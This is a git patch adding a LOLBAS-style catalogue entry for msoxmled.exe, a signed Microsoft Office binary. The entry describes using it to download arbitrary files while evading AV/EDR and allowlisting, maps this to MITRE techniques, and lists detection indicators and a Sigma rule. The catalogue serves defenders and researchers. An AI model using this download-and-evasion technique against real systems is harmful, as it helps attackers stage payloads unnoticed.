From ed3cd2b46919c58eb96bf5fa4050bb4c6a3d933b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Bo=C4=9Fa=C3=A7=20KAYA?= Date: Fri, 22 Aug 2025 18:56:43 +0300 Subject: [PATCH 1/2] Add msoxmled.exe as a LOLBin for file download and AV/EDR bypass --- yml/OSBinaries/Msoxmled.yml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 yml/OSBinaries/Msoxmled.yml diff --git a/yml/OSBinaries/Msoxmled.yml b/yml/OSBinaries/Msoxmled.yml new file mode 100644 index 00000000..6171f80a --- /dev/null +++ b/yml/OSBinaries/Msoxmled.yml @@ -0,0 +1,33 @@ +Name: msoxmled.exe +Description: Microsoft Office XML Editor, used to handle XML documents in Microsoft Office. +Author: Boğaç Kaya +Created: 2025-08-22 +Commands: + - Command: .\msoxmled.exe /verb open https://live.sysinternals.com/Sysmon64.exe + Description: Downloads a file from a specified URL using msoxmled.exe. + Usecase: Download arbitrary files from the internet, bypassing AV/EDR due to the legitimate nature of the binary. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: .\msoxmled.exe /verb open https://live.sysinternals.com/Sysmon64.exe + Description: Downloads a file from a specified URL using msoxmled.exe, evading defenses by using a signed Microsoft binary. + Usecase: Download arbitrary files while evading AV/EDR detection through legitimate signed binary proxy execution. + Category: AWL Bypass + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoxmled.exe + - Path: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\msoxmled.exe +Detection: + - IOC: msoxmled.exe making network connections to external URLs + - IOC: Unexpected file downloads initiated by msoxmled.exe + - IOC: Event ID 1 with Image: msoxmled.exe and CommandLine: msoxmled.exe /verb open + - IOC: Event ID 11 with Image: msoxmled.exe + - Sigma: https://github.com/frknclk34/SigmaRule/blob/main/Download%20Arbitrary%20Files%20Via%20Msoxmled.EXE +Resources: + - Link: https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013 +Acknowledgement: + - Person: Furkan CELİK + Handle: '@frknclk34' \ No newline at end of file From 73f14524acce7016f6b75ad34ddaad4d8c9fd55e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Bo=C4=9Fa=C3=A7=20KAYA?= Date: Wed, 27 Aug 2025 17:12:13 +0300 Subject: [PATCH 2/2] Add msoxmled.exe as a LOLBin for file download and AV/EDR bypass --- yml/OSBinaries/Msoxmled.yml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/yml/OSBinaries/Msoxmled.yml b/yml/OSBinaries/Msoxmled.yml index 6171f80a..f480884e 100644 --- a/yml/OSBinaries/Msoxmled.yml +++ b/yml/OSBinaries/Msoxmled.yml @@ -1,6 +1,7 @@ + --- Name: msoxmled.exe Description: Microsoft Office XML Editor, used to handle XML documents in Microsoft Office. -Author: Boğaç Kaya +Author: Bogac Kaya Created: 2025-08-22 Commands: - Command: .\msoxmled.exe /verb open https://live.sysinternals.com/Sysmon64.exe @@ -25,9 +26,11 @@ Detection: - IOC: Unexpected file downloads initiated by msoxmled.exe - IOC: Event ID 1 with Image: msoxmled.exe and CommandLine: msoxmled.exe /verb open - IOC: Event ID 11 with Image: msoxmled.exe - - Sigma: https://github.com/frknclk34/SigmaRule/blob/main/Download%20Arbitrary%20Files%20Via%20Msoxmled.EXE + - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_msoxmled_download.yml Resources: - Link: https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013 Acknowledgement: - - Person: Furkan CELİK - Handle: '@frknclk34' \ No newline at end of file + - Person: Bogac Kaya + Handle: 'bogackayaa' + - Person: Furkan Celik + Handle: '@fkrnclk34'